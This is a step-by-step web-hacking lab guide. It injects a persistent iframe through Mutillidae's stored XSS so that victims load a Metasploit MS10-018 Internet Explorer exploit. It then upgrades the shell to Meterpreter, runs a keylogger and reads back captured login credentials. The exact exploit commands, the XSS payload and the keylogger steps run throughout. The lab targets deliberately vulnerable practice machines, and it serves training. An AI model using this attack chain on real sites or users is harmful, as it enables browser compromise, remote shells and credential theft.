OWASP Top 10 Web Hacking Final Lab 16 - Persistent Covert Cross Site Scripting Injection with Metasploit #3

{ Persistent Covert Cross Site Scripting Injection with Metasploit #3 }

---

OWASP Top 10 Web Hacking Final  Lab 16

Start msfconsole

1. Start msfconsole (On BackTrack5R1)
   • Instructions:
     1. msfconsole
   • Note(FYI):
     1. The msfconsole is the Metasploit Framework Console.
2. Search for MS10-018
   • Instructions:
     1. search ms10_018
     2. use exploit/windows/browser/ms10_018_ie_behaviors
   • Note(FYI):
     1. This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in-the-wild and was previously known as the "iepeers" vulnerability. The name comes from Microsoft's suggested workaround to block access to the iepeers.dll file.
3. Set Payload
   • Instructions:
     1. set PAYLOAD windows/shell/bind_tcp
     2. show options
4. Set Required Variables
   • Note(FYI):
     • Replace 192.168.1.112 which your BackTrack's IP Address obtained from (Section 6, Step 2).
   • Instructions:
     1. set SRVHOST 192.168.1.112
     2. set URIPATH ms10_018.html
        • It is not necessary to set the URIPATH.  It is not necessary to use the name ms10_018_exploit.html.
     3. show options
5. Start Exploit Server
   • Instructions:
     1. exploit
     2. Highlight the Link
     3. Right Click and Copy the Weblink (See Picture)
   • Note(FYI):
     • The aurora exploit is all set up.
     • The server is started and the daemon is listening.

Section 9. Open Mutillidae

1. Open Firefox (On BackTrack5R1)
   • Instructions:
     1. Click on the Firefox Icon
   • Notes (FYI):
     • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
2. Open Mutillidae
   • Notes (FYI):
     1. Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
   • Instructions:
     1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/
3. Reset Database
   • Instructions:
     1. Click the Reset DB Link
   • Notes (FYI):
     • This link will remove the XSS Injection from the database.
4. Proceed with Database Reset
   • Instructions:
     1. Click the OK Button

Section 10. Persistent Covert Cross Site Script(XSS)

1. Add to your blog
   • Instructions:
     1. OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
2. Inspect Element
   • Instructions:
     1. Right Click in the Comment Box
     2. Click Inspect Element
   • Note(FYI):
     1. This is not a necessary step for the injection.  The goal is to allow the injection attempt to remain on the same line instead of being word-wrapped.
3. Change Text Area Column Length
   • Instructions:
     1. Change 65 to 95
     2. Click Close Button (See Picture)
4. Covert Metasploit Cross Site Script (XSS) Injection
   • Note(FYI):
     1. Replace 192.168.1.112 with your BackTrack IP Address obtained in (Section 6, Step 2).
     2. Everytime a users views all the Blog record, the malicious Metasploit link will be executed on the user's browser.
   • Instructions:
     1. Place the below text in the comment box.
        • <iframe src="http://192.168.1.112:8080/ms10_018.html"></iframe>
     2. Click the Save Blog Entry
5. View Metasploit Covert Cross Site Script (XSS) Results
   • Note(FYI):
     1. Notice that is said URL Not Found.
     2. At first glance it looks like we screwed up.  (But did we?).
6. View Metasploit Results
   • Instructions:
     1. Press Enter Once
     2. sessions -l
        • "-l" as in Larry.
   • Notes (FYI):
     1. The reason why the URL was not found in the previous step is because the exploit is geared for IE6, IE7 on Windows NT, 2000, XP, 2003 or Vista.

Section 11. Login to Mutillidae From Vulnerable Machine

1. Start up Internet Explo[d]er (On Damn Vulnerable WXP-SP2)
   • Instructions:
     1. Start --> All Programs --> Internet Explorer
2. Open the Mutillidae Application
   • Notes (FYI):
     1. Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
   • Instructions:
     1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/
     2. OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
3. Show All Blog Entries
   • Instructions:
     1. Select Show All from drop down menu
     2. Click the View Blog Entries Button
4. View the Metasploit Aurora Effect
   • Note(FYI):
   1. At first glance the status bar will appear to be loading, then it will just hang.
   2. In a few seconds, Internet Explo[d]er 6, will become un-responsive.
   3. Continue to Next Step.

Section 12. Activate Metasploit KeyStrokeLogger

1. View Metasploit Connection (On BackTrack)
   • Instructions:
     1. Press Enter Once
     2. sessions -l
        • "-l" as in Larry
   • Note(FYI):
     1. Notice we now have a connection from BackTrack(192.168.1.112) to Damn Vulnerable WXP (192.168.1.107).
2. Create New Meterpreter Session
   • Instructions:
     1. setg LHOST 192.168.1.112
        • This allows you to set the local host's IP address for the reverse communications needed to open the reverse command shell.
     2. sessions -u 1
        • "1" as in the number 1.
   • Note(FYI):
     1. Replace 192.168.1.112 with your BackTrack IP Address obtained from (Section 6, Step 2)
     2. The interpreter will start staging Meterpreter Payload Handler.
     3. Continue to Next Step.
3. Interact with the Meterpreter Session
   • Instructions:
     1. Press <Enter> to get a prompt
     2. sessions -l
        • "-l" as in larry.
        • Notice there are now two sessions: (1) Shell and (2) Meterpreter.
     3. sessions -i 2
        • "-i" means to interact
4. Activate the KeyLogRecorder
   • Instructions:
     1. run keylogrecorder
   • Note(FYI):
     • Notice the message that says the keystrokes are being saved to a file.
     • Record your file.

Section 13. Test Metasploit KeyLogRecorder

1. Kill Hung Mutillidae Webpage (On Damn Vulnerable WXP-SP2)
   • Note(FYI):
     1. If your Internet Explorer session DOES NOT exists, then skill this step.
   • Instructions:
     1. tasklist /V | findstr "mutillidae"
        • Obtain the PID associated with the Mutillidae process.
        • In my case it is 3940.
     2. taskkill /F /PID 3940
        • For the killing of the process ID 3940. 
        • In your case, it will be different.
2. Start up Internet Explo[d]er (On Damn Vulnerable WXP-SP2)
   • Instructions:
     1. Start --> All Programs --> Internet Explorer
3. Open the Mutillidae Application
   • Notes (FYI):
     1. Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
   • Instructions:
     1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/
        • Type each character to record each keystroke.
     2. Click Login/Register
4. Login
   • Instructions:
     1. Name: samurai
     2. Password: samurai
     3. Click the Login Button
   • Notes(FYI):
     1. We are logging on to Mutillidae to simulate a user logging on to a real application.
     2. The goal is to capture keystrokes.

Section 14. View Metasploit KeyLogRecorder Log

1. Stop the key logger recorder(On BackTrack)
   • Instructions:
     1. Copy Key Log Recorder File (See Picture)
     2. Press <Ctrl> and "c" to stop the keylogrecorder
2. Start Another Terminal
   • Instructions:
     1. Click on the Terminal Icon
3. View keylogrecorder File
   • Instructions:
     1. cat /root/.msf4/logs/scripts/keylogrecorder/*.txt
     2. Search for the mutillidae website
     3. Search for the username (samurai) and password (samurai)
   • Note(FYI):
     1. Its not the greatest logger, but it will do the job.

Section 15. Proof of Lab

1. Proof of Lab Các bạn hãy quay lại toàn bộ tiến trình thực hành và text note có tên của mình